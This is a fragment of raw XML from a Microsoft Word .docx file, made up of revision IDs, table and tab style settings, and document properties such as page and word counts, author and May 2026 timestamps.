    <w:rsid w:val="005025F0"/>
    <w:rsid w:val="00835F24"/>
    <w:rsid w:val="009E3BEF"/>
    <w:rsid w:val="00B3004F"/>
    <w:rsid w:val="00C6689C"/>
    <w:rsid w:val="00CE2C37"/>
    <w:rsid w:val="00D46937"/>
    <w:rsid w:val="00E00B0D"/>
    <w:rsid w:val="00EF7625"/>
    <w:rsid w:val="00F4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FD76"/>
  <w15:docId w15:val="{2FD8E7FE-4CA9-45B6-BD28-FE090A70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89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6689C"/>
    <w:rPr>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00EF762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F7625"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360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F7625"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E71C5-2151-4695-B498-D42EFEA08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44</Pages>
  <Words>4209</Words>
  <Characters>23995</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>199</Lines>
  <Paragraphs>56</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>28148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Vinoth M</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-08T09:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-10T15:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>